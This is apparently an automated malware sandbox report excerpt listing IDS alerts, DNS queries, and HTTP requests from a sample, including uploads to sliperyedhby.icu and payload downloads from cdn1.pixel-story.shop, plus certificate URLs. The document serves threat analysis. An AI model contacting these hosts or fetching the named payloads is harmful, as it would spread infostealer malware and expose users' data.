          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49712 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49714 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49704 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49711 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49707 -> 172.67.131.254:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49717 -> 172.67.185.54:443
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sliperyedhby.icu
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: sliperyedhby.icu
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZWV2Y3KCN3COQ12661GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12851Host: sliperyedhby.icu
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4CWKL50BXAXUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15044Host: sliperyedhby.icu
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WQY78TW6YBE83BZ74EOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20429Host: sliperyedhby.icu
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HA08J9ZOLZ5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5419Host: sliperyedhby.icu
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MUISZHMAEL50RMO2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5473Host: sliperyedhby.icu
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z0N24YS7XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1150Host: sliperyedhby.icu
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VS4N0X5BFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1066Host: sliperyedhby.icu
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: sliperyedhby.icu
          Source: global trafficHTTP traffic detected: GET /ldr_cp_pa HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cdn1.pixel-story.shop
          Source: global trafficHTTP traffic detected: GET /runcl.bin HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Host: cdn1.pixel-story.shop
          Source: global trafficHTTP traffic detected: GET /clp_pa.32 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Host: cdn1.pixel-story.shop
          Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
          Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
          Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
          Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
          Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
          Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
          Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
          Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
          Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
          Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /ldr_cp_pa HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cdn1.pixel-story.shop
          Source: global trafficHTTP traffic detected: GET /runcl.bin HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Host: cdn1.pixel-story.shop
          Source: global trafficHTTP traffic detected: GET /clp_pa.32 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Host: cdn1.pixel-story.shop
          Source: global trafficHTTP traffic detected: GET /profiles/76561198043764602 HTTP/1.1Host: steamcommunity.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Pdefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: sliperyedhby.icu
          Source: global trafficDNS traffic detected: DNS query: cdn1.pixel-story.shop
          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sliperyedhby.icu
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
          Source: InstallUtil.exe, 0000000F.00000002.2490650779.000000000102D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft;
          Source: msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000180E000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000019D6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000019D6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000180E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/https://store.steampowered.com/legal/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000180E000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000019D6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000180E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/http://store.steampowered.com/account/cookieprefe
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1603850920.00000000098D9000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000000.1561712933.0000000000915000.00000002.00000001.01000000.0000000A.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
          Source: Setup.exe, 00000000.00000002.1205380161.0000000003ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
          Source: 7LUEA3.pif, 0000000C.00000003.1620448866.0000000009D30000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1630485888.0000000009320000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1673281933.0000000006590000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, InstallUtil.exe, 0000000F.00000002.2451954352.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtdtls:
          Source: Setup.exe, 00000000.00000002.1211394304.000000000460E000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.000000000558F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htmhttps://store.steampowered.com/steam_refunds/responsive_page_m
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
